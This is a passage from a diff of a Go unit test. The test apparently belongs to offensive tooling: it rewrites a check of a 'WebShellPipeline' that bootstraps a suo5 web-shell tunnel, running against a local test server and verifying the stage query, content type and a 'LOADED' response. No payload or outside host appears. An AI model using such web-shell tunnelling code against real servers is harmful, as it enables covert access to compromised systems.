newHTTPTransport("suo5://unused", token, 5*time.Second) - transport.client = ts.Client() - transport.url = ts.URL - - _, err := transport.do(wsStageStatus, []byte("test"), 0) + p := &WebShellPipeline{ + Suo5URL: ts.URL, // use test server URL directly + httpClient: ts.Client(), + } + // Override suo5ToHTTPURL by using an http:// URL directly + body, err := p.bootstrapHTTP(wsStageStatus, nil) if err != nil { - t.Fatalf("transport.do: %v", err) + t.Fatalf("bootstrapHTTP: %v", err) } - // Envelope is plaintext: first byte must be the raw stage code. - if len(receivedBody) == 0 || receivedBody[0] != wsStageStatus { - t.Errorf("first byte = 0x%02x, want 0x%02x (plaintext stage)", receivedBody[0], wsStageStatus) + if gotStage != "status" { + t.Errorf("stage query = %q, want %q", gotStage, "status") + } + if gotCT != "application/octet-stream" { + t.Errorf("Content-Type = %q, want %q", gotCT, "application/octet-stream") + } + if string(body) != "LOADED" { + t.Errorf("body = %q, want %q", string(body), "LOADED") } }